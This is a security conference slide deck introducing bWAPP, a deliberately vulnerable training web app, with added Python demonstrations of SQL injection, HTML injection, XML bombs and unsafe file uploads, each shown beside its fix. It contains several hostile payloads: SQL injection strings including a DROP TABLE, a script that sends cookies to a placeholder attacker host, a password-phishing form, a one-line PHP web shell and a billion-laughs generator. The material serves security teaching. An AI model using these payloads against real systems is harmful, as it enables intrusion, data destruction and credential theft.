Infosecurity 2014 - Superbees Wanted

Event: Infosecurity 2014
Topic: Superbees Wanted
Location: Brussels Expo


1. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved.
   Defense Needed, Superbees Wanted
   Malik Mesellem
2. About Me
   • Malik Mesellem
   • Email | malik@itsecgames.com
   • LinkedIn | be.linkedin.com/in/malikmesellem
   • Twitter | twitter.com/MME_IT
   • Blog | itsecgames.blogspot.com
3. Contents
   • Defense Needed
   • bWAPP and bee-box
   • Web App Pentesting
   • Exploiting Vulnerabilities
   • Superbees Wanted
4. Contents (repeated; next section: Defense Needed)
5. Defense Needed
   • Web application security is today's most overlooked aspect of securing the enterprise
   • Attackers are concentrating their efforts on websites and web applications
   • Web apps are an attractive target for cyber crime, cyber warfare and hacktivism
6. Defense Needed: why are web applications an attractive target?
   • Easily reachable over the Internet, 24/7
   • Mission-critical business applications holding sensitive data
   • Often direct access to backend data
   • Traditional network firewalls and SSL provide no protection: the attack travels inside an ordinary, allowed (and possibly encrypted) HTTP request
   • Many applications are custom-made, and custom code is rarely tested against the well-known bug classes: custom-made == vulnerable
8. DEFENSE is needed!
9. Contents (repeated; next section: bWAPP and bee-box)
10. bWAPP == defense
   • bWAPP, or buggy Web APPlication
   • A deliberately insecure web application that includes all major known web vulnerabilities
   • Helps security enthusiasts, developers and students to discover and to prevent web application issues
   • Prepares you for successful penetration testing and ethical hacking projects
11. bWAPP (screenshot)
12. bWAPP
   • Web application security is not just installing a firewall or scanning a site for 'potential' issues
   • Black-box penetration testing, simulating real attack scenarios, is still needed!
   • It confirms potential vulnerabilities and rules out false positives
   • It shows whether your defense measures are actually working
   • bWAPP helps to improve your security-testing skills...
13. (image only)
14. bWAPP: Testimonials
   • "Awesome! It's good to see fantastic tools staying up to date ..." - Ed Skoudis, Founder of Counter Hack
   • "I just installed bWAPP 1.6 into the next release of SamuraiWTF ... It's a great app ..." - Justin Searle, Managing Partner at UtiliSec
   • "Great progress on bWAPP BTW! :)" - Vivek Ramachandran, Owner of SecurityTube
15. bWAPP: Architecture
   • Open source PHP application
   • MySQL backend database
   • Hosted on Linux or Windows, with Apache or IIS
   • Supported on WAMP or XAMPP
16. bWAPP: Features (1)
   • Very easy to use and to understand
   • Well-structured and documented PHP code
   • Different security levels (low/medium/high)
   • 'New user' creation (password/secret)
   • 'Reset application/database' feature
   • Manual intervention page
   • Email functionality
17. bWAPP: Features (2)
   • Local PHP settings file
   • No-authentication mode (A.I.M.)
   • 'Evil Bee' mode, bypassing security checks
   • 'Evil' directory, containing attack scripts
   • WSDL file (Web Services/SOAP)
   • Fuzzing possibilities
18. bWAPP: What makes bWAPP so unique?
   • Well, it has over 70 web bugs!
   • Covering all major known web vulnerabilities
   • Including all risks from the OWASP Top 10 project
19. bWAPP: Which bug do you want to hack today?
20. Which bug do you want to hack today? (1)
   • SQL, HTML, SSI, OS command, XML, XPath, LDAP, PHP code, Host header and SMTP injections
   • Authentication, authorization and session management issues
   • Malicious, unrestricted file uploads and backdoor files
   • Arbitrary file access and directory traversal
   • PHP-CGI remote code execution
   • Local and remote file inclusion (LFI/RFI)
   • Server-Side Request Forgery (SSRF)
21. Which bug do you want to hack today? (2)
   • Configuration issues: Man-in-the-Middle, cross-domain policy file, FTP, WebDAV, information disclosure, ...
   • HTTP parameter pollution and HTTP response splitting
   • XML External Entity attacks (XXE)
   • HTML5 clickjacking, Cross-Origin Resource Sharing (CORS) and web storage issues
   • Unvalidated redirects and forwards
   • Denial-of-Service (DoS) attacks
22. Which bug do you want to hack today? (3)
   • Cross-Site Scripting (XSS), Cross-Site Tracing (XST) and Cross-Site Request Forgery (CSRF)
   • AJAX and web services issues (JSON/XML/SOAP)
   • Parameter tampering and cookie poisoning
   • HTTP verb tampering
   • Local privilege escalation
   • And much more...
23. bWAPP (screenshot)
24. bWAPP: External links
   • Home page - www.itsecgames.com
   • Download location - sourceforge.net/projects/bwapp
   • Blog - itsecgames.blogspot.com
25. bee-box
   • Every bee needs a home... the bee-box
   • VM pre-installed with bWAPP
   • LAMP environment: Linux, Apache, MySQL and PHP
   • Compatible with VMware and VirtualBox
   • Requires zero installation
26. bee-box
   • bee-box is also made deliberately insecure...
   • Opportunity to explore all bWAPP vulnerabilities
   • Gives you several ways to hack and deface bWAPP
   • Even possible to hack the bee-box itself and get full root access!
   • Hacking, defacing and exploiting without going to jail
   • bee-box is available from the same SourceForge project as bWAPP (sourceforge.net/projects/bwapp)
27. bee-box (screenshot)
28. bee-box: Features (1)
   • Apache, MySQL and PHP installed
   • Several PHP extensions installed
   • Vulnerable PHP-CGI
   • phpMyAdmin installed
   • Postfix installed and configured
   • Insecure FTP and WebDAV configurations
   • AppArmor disabled
29. bee-box: Features (2)
   • Weak self-signed SSL certificate
   • 'Fine-tuned' (that is, deliberately loose) file access permissions
   • .htaccess file support enabled
   • Some basic security tools installed
   • Shortcuts to start, install and update bWAPP
   • An amazing wallpaper :)
   • An outdated Linux kernel...
30. bWAPP and bee-box
   • Both are part of the ITSEC GAMES project
   • A fun approach to IT security education
   • IT security, ethical hacking, training and fun...
   • All ingredients mixed together :)
   • Educational and recreational InfoSec training
31. bWAPP and bee-box: Ready, set, and hack!
   • There's just one thing to remember
   • The logon credentials are...
32. bee/bug
33. bWAPP and bee-box: Ready, set, and hack!
   • The logon credentials are bee/bug
   • So please don't bug me anymore :)
34. bWAPP and bee-box: Installation and configuration
   • Install VMware Player or Oracle VirtualBox
   • Extract, install, and start the bee-box VM
   • Configure or check the IP settings (a host-only or NAT network is the safe choice: the VM is deliberately rootable, so never attach it to a network you do not control)
   • Browse to the bWAPP web app: http://[IP]/bWAPP/
   • Log in with bee/bug
35. bWAPP and bee-box: General application settings
   • settings.php, located in the bWAPP admin folder
   • Connection settings
   • SMTP settings
   • A.I.M. mode
   • Evil Bee mode
   • Static credentials
36. Settings (screenshot)
37. bWAPP and bee-box: A.I.M.
   • Authentication Is Missing, a no-authentication mode
   • May be used for testing web scanners and crawlers
   • Procedure: change the IP address in the settings file, then point your web scanner or crawler to http://[IP]/bWAPP/aim.php
   • All hell breaks loose... (every vulnerable page is reachable without a session, so expect the scanner to exercise the destructive ones too)
38. bWAPP and bee-box: Worst-case-scenario options
   • Reset the application: http://[IP]/bWAPP/reset.php
   • Reset the application + database: http://[IP]/bWAPP/reset.php?secret=bWAPP
   • Reinstall the database: drop the database from phpMyAdmin, then run http://[IP]/bWAPP/install.php
39. Finally, time for a DEMO
40. Demo
41. Contents (repeated; next section: Web App Pentesting)
42. Penetration Testing
   • Penetration testing, or pentesting
   • A method of evaluating computer, network or application security by simulating an attack
   • Active analysis of potential vulnerabilities using ethical hacking techniques
   • Penetration tests are sometimes one component of a full security audit
43. Web App Penetration Testing
   • Web application pentesting focuses on evaluating the security of a web application
   • The application is tested for known web vulnerabilities
   • Manual, automatic and semi-automatic tests
   • Source code analysis and web server configuration review as an option
44. Web App Penetration Testing
   • It's all about identifying, exploiting, and reporting vulnerabilities
   • Some considerations...
   • Commercial tools vs. open source tools
   • Relying on a single tool is not a best practice; cross-check findings between tools and by hand
   • Most commercial scanners only detect and don't exploit, so every finding still needs manual confirmation
   • False positives are not allowed!
   • People don't like auto-generated reports
45. Testing Methodologies: a simple testing methodology (diagram)
46. Testing Methodologies: a more advanced testing methodology (diagram)
47. OWASP
   • OWASP, the Open Web Application Security Project
   • Worldwide non-profit organization focused on improving the security of software
   • Freely available articles, methodologies, documentation, tools, and technologies
   • Vendor neutral: no recommendations for commercial products or services!
48. OWASP: Current OWASP projects
   • Top 10 Project and Testing Guide
   • Development Guide and Code Review Guide
   • Application Security Verification Standard (ASVS)
   • Broken Web Applications (BWA)
   • Zed Attack Proxy (ZAP)
49. OWASP
   • The OWASP Top 10 Project lists the 10 most critical web application security risks
   • Updated every few years; the latest edition at the time of this talk was released in 2013
   • Referenced by many standards, books, tools, and organizations, including MITRE and PCI DSS
   • A good starting point for a web application pentest
   • What to test? How to test? How to prevent?
50. OWASP Top 10 Application Security Risks (table)
51. OWASP Top 10 placement (diagram)
52. Introduction to Kali Linux
   • Kali Linux is a Debian-derived Linux distribution
   • Designed for digital forensics and penetration testing
   • Successor to BackTrack
   • Maintained and funded by Offensive Security
   • Support for x86 and ARM
53. Introduction to Kali Linux
   • Includes many web app pentesting tools: Burp Suite, DirBuster, Metasploit, Nikto, sqlmap, w3af, WebSploit, ZAP
54. Intercepting Proxies
   • Intercepting proxies are testing tools acting as a legitimate Man-in-the-Middle (MitM)
   • Located between the browser and the web application
   • Able to intercept and modify requests and responses
   • Keep a historical record of all requests
   • Include integrated tools to discover vulnerabilities, and to crawl and brute-force files and directories
55. Intercepting Proxies: ZAP, Zed Attack Proxy
   • OWASP project, by Simon Bennetts
   • Java application, released in September 2010
   • Fork of the Paros intercepting proxy
   • Pentesting tool for finding vulnerabilities
   • Provides automated scanning, as well as a set of tools to find security vulnerabilities manually
56. Intercepting Proxies: ZAP functionality
   • Intercepting proxy, listening on TCP/8080 by default
   • Traditional and AJAX spider
   • Active and passive scanner
   • Fuzzing and brute-force capabilities
   • Smartcard and client certificate support
   • Authentication and session support
57. ZAP, Zed Attack Proxy (screenshot)
58. Demo: ZAP, Zed Attack Proxy
   • Parameter/cookie tampering
   • Online password attack
   • Detecting vulnerabilities
59. Commercial Web Scanners: Netsparker
   • Automated web security scanner, marketed as 'false positive free'
   • Identifies security issues and vulnerabilities such as SQL injection and Cross-Site Scripting (XSS)
   • Automatically exploits detected vulnerabilities to confirm them before reporting, which is what backs the 'no false positives' claim
   • Site: https://www.netsparker.com/
60. Commercial Web Scanners (screenshot)
61. Commercial Web Scanners: Netsparker (screenshot)
62. Ready to exploit some bugs?
63. Contents (repeated; next section: Exploiting Vulnerabilities)
64. SQL Injection
   • SQL injection is very common in web applications
   • Occurs when user input is concatenated into the query text and handed to the SQL interpreter as part of the query
   • The attacker tricks the interpreter into executing unintended SQL queries
65. SQL Injection: Injection in the OWASP Top 10 (table)
66. SQL Injection: normal operation
   BROWSER --HTML form (GET/POST): login, password--> WEB APP
   WEB APP --SQL: SELECT * FROM table WHERE login = 'login' AND password = 'password'--> SQL INTERPRETER / DATABASE
   DATABASE --result--> WEB APP --HTML--> BROWSER
67. SQL Injection: abnormal operation
   The browser submits ' or 1=1-- as the password. The web app concatenates it unchanged, so the SQL interpreter receives:
   SELECT * FROM table WHERE login = 'login' AND password = '' or 1=1-- '
   Everything after -- is a comment, and "or 1=1" makes the WHERE clause true for every row, so the query returns rows without a valid password.
68. SQL Injection: simple injections
   • '--
   • ' or 'a'='a
   • ' or 'a'='a'--
   • ' or '1'='1
   • ' or 1=1--
   (MySQL only treats -- as a comment when it is followed by whitespace, so type a trailing space after -- or use # instead)
69. SQL Injection: union injections
   • ' UNION SELECT field1, field2 FROM table--
   • ' UNION SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()--
   (the UNION has to return the same number of columns as the original SELECT; INFORMATION_SCHEMA is the database's own catalogue, which is how you learn table and column names)
   Stacked queries
   • '; DROP TABLE table;--
   (only works where the database API executes several statements per call; PHP's mysql_query() refuses that, mysqli_multi_query() and many other stacks allow it)
70. SQL Injection (screenshot)
71. Demo: SQL Injection
   • Bypassing login forms
   • Manually extracting data
   • Automated SQL injection
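The login bypass and the UNION trick from slides 67 to 69, played out against a throwaway in-memory SQLite database. This is an added example, not code from the deck or from bWAPP: the users table and its two rows are constructed, and sqlite_master stands in for MySQL's INFORMATION_SCHEMA.TABLES. The vulnerable function builds the query by concatenation exactly as the slide's diagram shows; the fixed one binds the same input as a parameter. (SQLite accepts -- as a comment without the trailing space that MySQL needs.)

```python
import sqlite3

# Constructed stand-in for a login table; this is NOT bWAPP's real schema, just
# enough rows to show the effect of the payloads from the slides.
SEED_SQL = [
    "CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT, secret TEXT)",
    "INSERT INTO users (login, password, secret) VALUES ('bee', 'bug', 'A bee''s secret')",
    "INSERT INTO users (login, password, secret) VALUES ('admin', 'Adm1nP@ss', 'Root of the hive')",
]


def fresh_db():
    """In-memory SQLite database seeded with the constructed rows above."""
    con = sqlite3.connect(":memory:")
    for stmt in SEED_SQL:
        con.execute(stmt)
    return con


def build_vulnerable_query(login, password):
    """The string-concatenation pattern of slide 66: user input becomes SQL text."""
    return ("SELECT login, secret FROM users WHERE login = '" + login
            + "' AND password = '" + password + "'")


def login_vulnerable(con, login, password):
    """Returns matching (login, secret) rows; a non-empty result means 'logged in'."""
    return con.execute(build_vulnerable_query(login, password)).fetchall()


def login_fixed(con, login, password):
    """Same query with bound parameters: the driver sends the input as data, so
    quotes, comments and UNIONs inside it are never parsed as SQL."""
    sql = "SELECT login, secret FROM users WHERE login = ? AND password = ?"
    return con.execute(sql, (login, password)).fetchall()


def demo():
    """Runs the slide payloads against both implementations and returns the rows."""
    con = fresh_db()
    return {
        # slide 67: password field replaced by ' or 1=1-- ; every row comes back
        "or_1_eq_1": login_vulnerable(con, "bee", "' or 1=1--"),
        # pick a specific victim: the comment swallows the password check entirely
        "admin_no_password": login_vulnerable(con, "admin'--", "whatever"),
        # slide 69: UNION to read the schema catalogue; column count (2) must match
        "union_schema": login_vulnerable(con, "x", "' UNION SELECT name, sql FROM sqlite_master--"),
        # the same payloads are inert against the parameterised query
        "fixed_or_1_eq_1": login_fixed(con, "bee", "' or 1=1--"),
        "fixed_admin_comment": login_fixed(con, "admin'--", "whatever"),
        "fixed_real_login": login_fixed(con, "bee", "bug"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:20s} -> {rows}")
```

Running it prints the full table for the `or 1=1` case, the admin row for the `admin'--` case, and the CREATE TABLE statement for the UNION case, while the three `fixed_*` entries return only what a genuine login would. Input validation is not the fix here; parameterised statements (or a query builder that uses them) are.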
72. HTML Injection
   • HTML injection occurs when a user can insert HTML code via an input field or parameter and the application echoes it back into a page unencoded
   • Root cause: insufficient validation and output encoding of user-supplied data
   • Dangerous when it is stored permanently: every later visitor receives the injected markup!
   • HTML injection can lead to website defacement, phishing attacks and client-side exploitation
73. Demo: HTML Injection
   • Website defacement
   • Phishing attack
   • Client-side exploitation
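The three outcomes of slide 72 as rendered output, with the weak filter that often passes for a "medium" fix and the output-encoding fix beside it. This is an added example and not bWAPP's code: the page template, the three payloads and the attacker host name attacker.invalid are constructed for the demonstration, and the tag-stripping filter is a generic one, not a claim about how any bWAPP security level is implemented.

```python
import html
import re

# Constructed payloads of the three kinds the slide lists. attacker.invalid is a
# reserved placeholder name, not a real host.
DEFACEMENT = '<h1 style="color:red">Hacked by an evil bee</h1>'
PHISHING = ('<form action="http://attacker.invalid/steal" method="post">'
            'Session expired, please log in again: <input name="password"></form>')
# The nested form survives naive tag stripping: removing the inner <script>
# re-assembles the outer one.
CLIENT_SIDE = ('<scr<script>ipt>document.location="http://attacker.invalid/?c="'
               '+document.cookie</scr<script>ipt>')

TEMPLATE = "<html><body><p>Last message: {msg}</p></body></html>"


def render_vulnerable(message):
    """Stored or reflected message dropped straight into the page; the browser parses it as markup."""
    return TEMPLATE.format(msg=message)


def render_blacklist(message):
    """A typical weak fix: strip <script> and </script> in one pass, case-insensitively.
    It does nothing against <h1> or <form>, and the nested payload defeats it."""
    cleaned = re.sub(r"</?script>", "", message, flags=re.IGNORECASE)
    return TEMPLATE.format(msg=cleaned)


def render_fixed(message):
    """Output encoding: <, >, &, ' and " become entities, so the text is displayed as text.
    This is the right fix for untrusted data placed in HTML element content."""
    return TEMPLATE.format(msg=html.escape(message, quote=True))


def injected_tags(page):
    """Names of tags that appear as real markup in the page beyond the template's own three.
    An empty list means nothing the user sent is interpreted as HTML."""
    own = {"html", "body", "p"}
    return sorted({t.lower() for t in re.findall(r"<([a-zA-Z][a-zA-Z0-9]*)", page)} - own)


if __name__ == "__main__":
    for label, payload in (("defacement", DEFACEMENT), ("phishing", PHISHING), ("client-side", CLIENT_SIDE)):
        print(label, "vulnerable:", injected_tags(render_vulnerable(payload)),
              "blacklist:", injected_tags(render_blacklist(payload)),
              "fixed:", injected_tags(render_fixed(payload)))
```

The blacklist case is worth looking at closely: it removes exactly two substrings from the nested payload and hands the browser a perfectly formed `<script>` element. Encoding on output needs no knowledge of which tags are dangerous, which is why it holds up. Where the data lands in an attribute, a URL or inline JavaScript instead of element content, the encoding rules differ and html.escape alone is not sufficient.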
74. Denial-of-Service
   • Denial-of-Service attack, or DoS attack
   • The attacker tries to prevent legitimate users from accessing the application, server or network
   • Consumes network bandwidth, server sockets, threads, or CPU resources
   • Distributed Denial-of-Service attack, or DDoS: the same, launched from many sources at once
   • Popular techniques with hacktivists
75. Denial-of-Service
   • Newer layer 7 DoS attacks are more powerful!
   • "Low-bandwidth application layer DoS"
   • Advantages of layer 7 DoS, from the attacker's point of view:
   • Legitimate TCP/UDP connections, hard to distinguish from normal traffic
   • Requires far fewer connections; a single attacker can stall a web server
   • Exhausts a limit of the service itself (worker threads, connection slots, parser memory) rather than raw bandwidth or CPU, so a bigger server does not help
76. Denial-of-Service: layer 7 DoS methods
   • HTTP Slow Headers
   • HTTP Slow POST
   • HTTP Slow Read
   • Apache Range Header
   • SSL/TLS renegotiation
   • XML bombs (recursive entity expansion)
77. Demo: Denial-of-Service
   • HTTP Slow POST
   • XML bombs
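An XML bomb from the list above, together with the check a service should run before handing untrusted XML to a parser. This is an added example, not code from the deck or bWAPP. The generator reproduces the well-known "billion laughs" document (nine nested entities, fan-out ten); the checker computes what the entity references would expand to from the declarations alone, without expanding anything, and also refuses external entity declarations, which are the XXE case from slide 21. The benign document and the size limits are constructed choices; the regex-based DTD parsing covers internal general entities only and is a gate, not a full XML parser.

```python
import re


def make_billion_laughs(depth=9, fanout=10):
    """Build the classic entity-expansion bomb: ~1 KB of text that expands to 3 GB."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + f'\n]>\n<lolz>&lol{depth};</lolz>')


# Constructed benign document with one small internal entity, for comparison.
BENIGN = ('<?xml version="1.0"?>\n<!DOCTYPE note [ <!ENTITY who "Malik"> ]>\n'
          '<note><from>&who;</from><to>&who;</to></note>')

_DOCTYPE = re.compile(r"<!DOCTYPE\b[^\[>]*(?:\[(.*?)\])?\s*>", re.S)
_INTERNAL_ENTITY = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"')
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC)\b")
_REF = re.compile(r"&(\w+);")


def entity_sizes(dtd_text):
    """Expanded length of every internal general entity, computed from the
    declarations: nothing is expanded, so this is cheap even for a bomb.
    Raises on recursive definitions, which XML forbids anyway."""
    decls = dict(_INTERNAL_ENTITY.findall(dtd_text))
    memo = {}

    def size(name, stack):
        if name in stack:
            raise ValueError(f"recursive entity &{name};")
        if name not in decls:          # predefined (&lt; &amp; ...) or undeclared: about 1 char
            return 1
        if name not in memo:
            body = decls[name]
            plain = len(_REF.sub("", body))
            memo[name] = plain + sum(size(m.group(1), stack + (name,))
                                     for m in _REF.finditer(body))
        return memo[name]

    return {n: size(n, ()) for n in decls}


def expansion_cost(xml_text):
    """Number of characters the entity references in the document body expand to."""
    m = _DOCTYPE.search(xml_text)
    dtd = (m.group(1) or "") if m else ""
    body = xml_text[m.end():] if m else xml_text
    sizes = entity_sizes(dtd)
    return sum(sizes.get(r.group(1), 1) for r in _REF.finditer(body))


def check_xml(xml_text, max_cost=1_000_000, max_amplification=100):
    """Gate to run before parsing untrusted XML. Returns (ok, reason)."""
    m = _DOCTYPE.search(xml_text)
    if m and _EXTERNAL_ENTITY.search(m.group(0)):
        return False, "external entity declaration (XXE risk)"
    try:
        cost = expansion_cost(xml_text)
    except ValueError as exc:
        return False, str(exc)
    if cost > max_cost:
        return False, f"entity expansion of {cost} characters exceeds limit"
    if cost > max_amplification * len(xml_text):
        return False, f"amplification factor {cost // len(xml_text)}x exceeds limit"
    return True, "ok"


if __name__ == "__main__":
    bomb = make_billion_laughs()
    print(len(bomb), "bytes on the wire, expands to", expansion_cost(bomb), "characters")
    print(check_xml(bomb))
    print(check_xml(BENIGN))
```

The amplification limit catches smaller bombs that stay under the absolute cap, and the external-entity refusal is the cheapest XXE defence available when the application has no need for DTDs at all. Recent libexpat releases (2.4 and later) apply their own amplification limits, but a service that accepts XML from the network should not rely on the parser build it happens to be linked against.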
78. Unrestricted File Uploads
   • Malicious, or unrestricted, file uploads
   • File upload flaws occur when an attacker can upload files without any restrictions, or by bypassing weak restrictions (extension blacklists, client-side checks, trust in the Content-Type header)
   • The first step in many attacks is getting some code onto the system under attack!
   • An unrestricted file upload does exactly that for the attacker...
   • The attacker then only needs to find a way to get the code executed, for instance by requesting the uploaded file under the web root
79. Unrestricted File Uploads
   • Web shells are malicious web pages that give an attacker functionality on a web server
   • Written in server-side scripting languages like PHP, ASP, ASPX, JSP, CFM, Perl, ...
   • Web shell functionalities: file transfer, command execution, network reconnaissance, database connectivity
80. Unrestricted File Uploads: external attack vectors for planting web shells
   • Unrestricted file uploads
   • Remote file inclusion
   • SQL injection
   • OS command injection
   • Insecure FTP, WebDAV, ...
81. Demo: Unrestricted File Uploads
   • Shell access
   • Escalating privileges...
   • Getting r00t access!
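The "weak restrictions" of slide 78 next to a check that holds up, run over a handful of constructed uploads. This is an added example, not bWAPP's upload code: the assumption is an image-only upload form, the sample file names and contents (including the one-line PHP shell) are constructed, and the naive check is a generic extension blacklist rather than a description of any bWAPP security level.

```python
import os
import secrets

# Magic bytes for the only file types this endpoint is supposed to accept
# (assumption for the example: an image upload form).
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Constructed sample uploads: (client-supplied name, leading bytes of the content).
SAMPLES = {
    "plain shell": ("shell.php", b"<?php system($_GET['cmd']); ?>"),
    "case trick": ("shell.PhP", b"<?php system($_GET['cmd']); ?>"),
    "alternate ext": ("shell.phtml", b"<?php system($_GET['cmd']); ?>"),
    "double ext": ("shell.php.jpg", b"<?php system($_GET['cmd']); ?>"),
    "traversal": ("../../../var/www/evil.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    "real image": ("bee.JPG", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
}


def check_upload_naive(filename):
    """The weak restriction many apps ship: reject names ending in '.php'.
    Returns True when the upload would be accepted. Four of the six samples get through."""
    return not filename.endswith(".php")


def check_upload(filename, content):
    """Allowlist the extension, verify the content's magic bytes, and never reuse the
    client's file name. Returns (accepted, reason, stored_name)."""
    name = os.path.basename(filename.replace("\\", "/"))   # drop client-supplied directories
    if "\x00" in name:
        return False, "null byte in file name", None
    if "." not in name:
        return False, "no extension", None
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not on the allowlist", None
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, f"content is not a {ext} file", None
    # Server-chosen random name with a single, known-safe extension: nothing the
    # attacker controls ends up in the path, so "shell.php.jpg" can never exist on disk.
    stored = secrets.token_hex(16) + "." + ("jpg" if ext == "jpeg" else ext)
    return True, "accepted", stored


def run_samples():
    """Both checks over the constructed samples: {label: (naive_accepts, strict_accepts)}."""
    return {label: (check_upload_naive(name), check_upload(name, data)[0])
            for label, (name, data) in SAMPLES.items()}


if __name__ == "__main__":
    for label, verdict in run_samples().items():
        print(f"{label:14s} naive={verdict[0]!s:5s} strict={verdict[1]}")
```

The magic-byte check is not a guarantee on its own (a valid JPEG can carry PHP in a comment segment), so the control that actually matters is the last one: the stored file has a random name, an image extension and, in a real deployment, lives in a directory outside the web root or one where script execution is disabled, which is an assumption this snippet leaves to the surrounding application.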
82. Contents (repeated; next section: Superbees Wanted)
83. Superbees Wanted
   • And we have so many more bugs to exploit...
   • It's definitely time to improve your web security
   • Defense is needed, and testing is required!
   • Downloading bWAPP is a first step
   • Remember: every bee needs a superbee
   • Are you that superbee?
   @MME_IT #bWAPP
84. Contact Me
   • Malik Mesellem
   • Email | malik@itsecgames.com
   • LinkedIn | be.linkedin.com/in/malikmesellem
   • Twitter | twitter.com/MME_IT
   • Blog | itsecgames.blogspot.com
